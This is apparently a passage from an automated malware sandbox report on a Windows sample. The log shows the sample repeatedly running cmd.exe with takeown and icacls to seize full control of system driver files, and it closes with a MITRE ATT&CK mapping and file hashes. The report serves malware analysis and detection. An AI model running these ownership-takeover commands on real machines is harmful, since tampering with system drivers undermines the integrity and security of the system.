C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\netbt.sys /grant "Admin:F"3⤵PID:7860
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\netio.sys && icacls C:\Windows\System32\drivers\netio.sys /grant "%username%:F" && exit2⤵PID:6284
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\netio.sys3⤵
- Possible privilege escalation attempt
PID:7556
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\netio.sys /grant "Admin:F"3⤵PID:7896
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\netvsc.sys && icacls C:\Windows\System32\drivers\netvsc.sys /grant "%username%:F" && exit2⤵PID:7188
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\netvsc.sys3⤵PID:7400
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\netvsc.sys /grant "Admin:F"3⤵PID:7888
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\npfs.sys && icacls C:\Windows\System32\drivers\npfs.sys /grant "%username%:F" && exit2⤵PID:7204
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\npfs.sys3⤵PID:7792
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\npfs.sys /grant "Admin:F"3⤵PID:8152
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\npsvctrig.sys && icacls C:\Windows\System32\drivers\npsvctrig.sys /grant "%username%:F" && exit2⤵PID:7240
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\npsvctrig.sys3⤵PID:7872
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\npsvctrig.sys /grant "Admin:F"3⤵PID:6072
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nsiproxy.sys && icacls C:\Windows\System32\drivers\nsiproxy.sys /grant "%username%:F" && exit2⤵PID:7296
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\nsiproxy.sys3⤵PID:7764
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\nsiproxy.sys /grant "Admin:F"3⤵PID:8136
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ntfs.sys && icacls C:\Windows\System32\drivers\ntfs.sys /grant "%username%:F" && exit2⤵PID:7436
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ntfs.sys3⤵PID:8044
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ntfs.sys /grant "Admin:F"3⤵PID:7668
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ntosext.sys && icacls C:\Windows\System32\drivers\ntosext.sys /grant "%username%:F" && exit2⤵PID:7540
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ntosext.sys3⤵PID:6868
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\null.sys && icacls C:\Windows\System32\drivers\null.sys /grant "%username%:F" && exit2⤵PID:7640
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\null.sys3⤵
- Possible privilege escalation attempt
PID:7928
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\null.sys /grant "Admin:F"3⤵PID:5776
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nvdimm.sys && icacls C:\Windows\System32\drivers\nvdimm.sys /grant "%username%:F" && exit2⤵PID:7692
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\nvdimm.sys3⤵PID:8168
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\nvdimm.sys /grant "Admin:F"3⤵PID:6508
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nvmedisk.sys && icacls C:\Windows\System32\drivers\nvmedisk.sys /grant "%username%:F" && exit2⤵PID:7728
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\nvmedisk.sys3⤵PID:6204
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\nvmedisk.sys /grant "Admin:F"3⤵PID:7620
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nvraid.sys && icacls C:\Windows\System32\drivers\nvraid.sys /grant "%username%:F" && exit2⤵PID:7824
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\nvraid.sys3⤵PID:7408
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\nvraid.sys /grant "Admin:F"3⤵PID:7768
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nvstor.sys && icacls C:\Windows\System32\drivers\nvstor.sys /grant "%username%:F" && exit2⤵PID:7972
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\nvstor.sys3⤵PID:7404
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\nvstor.sys /grant "Admin:F"3⤵PID:7900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nwifi.sys && icacls C:\Windows\System32\drivers\nwifi.sys /grant "%username%:F" && exit2⤵PID:8032
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\nwifi.sys3⤵PID:7520
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\nwifi.sys /grant "Admin:F"3⤵PID:6708
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\p9rdr.sys && icacls C:\Windows\System32\drivers\p9rdr.sys /grant "%username%:F" && exit2⤵PID:8100
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\p9rdr.sys3⤵PID:5636
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pacer.sys && icacls C:\Windows\System32\drivers\pacer.sys /grant "%username%:F" && exit2⤵PID:8160
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\pacer.sys3⤵PID:6276
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\parport.sys && icacls C:\Windows\System32\drivers\parport.sys /grant "%username%:F" && exit2⤵PID:6124
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\parport.sys3⤵PID:6844
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\parport.sys /grant "Admin:F"3⤵PID:7752
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\partmgr.sys && icacls C:\Windows\System32\drivers\partmgr.sys /grant "%username%:F" && exit2⤵PID:5548
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\partmgr.sys3⤵PID:5980
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pci.sys && icacls C:\Windows\System32\drivers\pci.sys /grant "%username%:F" && exit2⤵PID:6184
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\pci.sys3⤵PID:7172
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pciide.sys && icacls C:\Windows\System32\drivers\pciide.sys /grant "%username%:F" && exit2⤵PID:5408
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pciidex.sys && icacls C:\Windows\System32\drivers\pciidex.sys /grant "%username%:F" && exit2⤵PID:7564
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pcmcia.sys && icacls C:\Windows\System32\drivers\pcmcia.sys /grant "%username%:F" && exit2⤵PID:7528
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pcw.sys && icacls C:\Windows\System32\drivers\pcw.sys /grant "%username%:F" && exit2⤵PID:3552
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pdc.sys && icacls C:\Windows\System32\drivers\pdc.sys /grant "%username%:F" && exit2⤵PID:7836
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6596
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Winlogon Helper DLL
2Event Triggered Execution
1Change Default File Association
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
2Winlogon Helper DLL
2Event Triggered Execution
1Change Default File Association
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\Desktop\ß■4◄¥▼¶9☻²∞ěä×♣6☻ø¤╚ž↑◘ń♀£╚ñφÇ4¾ñ¬↕ä►▲2σ¶╬♀¥╧ě52☼♀ěπ▌å∩ïč▌♀♂µä½↑±äœ¼Æσ■∞íñé₧╧7○Æ▬▄ñ∞ěŸ®♫ßæ♪••■™ñæ½◘¶
Filesize666B
MD59e1e5883c74742a497cf5c272ccd2321
SHA12cf33e34d08b8e17743a60352baffef4b6f02dee
SHA256ca687b6a7c3d29b566f3e1988b9f877b51d9a83ee25ffe0755a8dcd3eb5f434a
SHA512f2284f0c624cc07a65c16f87865bb98aaa176b1d8b45cd4fbcc1143c9c2297fe6b1d4db55ef054be2bc151c8cc25ff4da7c997b7d38dae3dccd2ffe1c3c01a6b
-
Filesize
103KB
MD5373d53d7c6709d5106b29a26a71b0d31
SHA11708009c111266ba513503e06b94a5ccd402dee5
SHA256de3f42bc53000d3dad58f3182108c414ce8062095ef390314fcc628473490c86
SHA51215b32cd9b87a9852d6ad0f03321edb15468e136a220ff4473bc109355c9b401a4c4f7eeb99ad7097c67f9cfac7c416f84038c0639e4db59561d2dbc74ef5d67d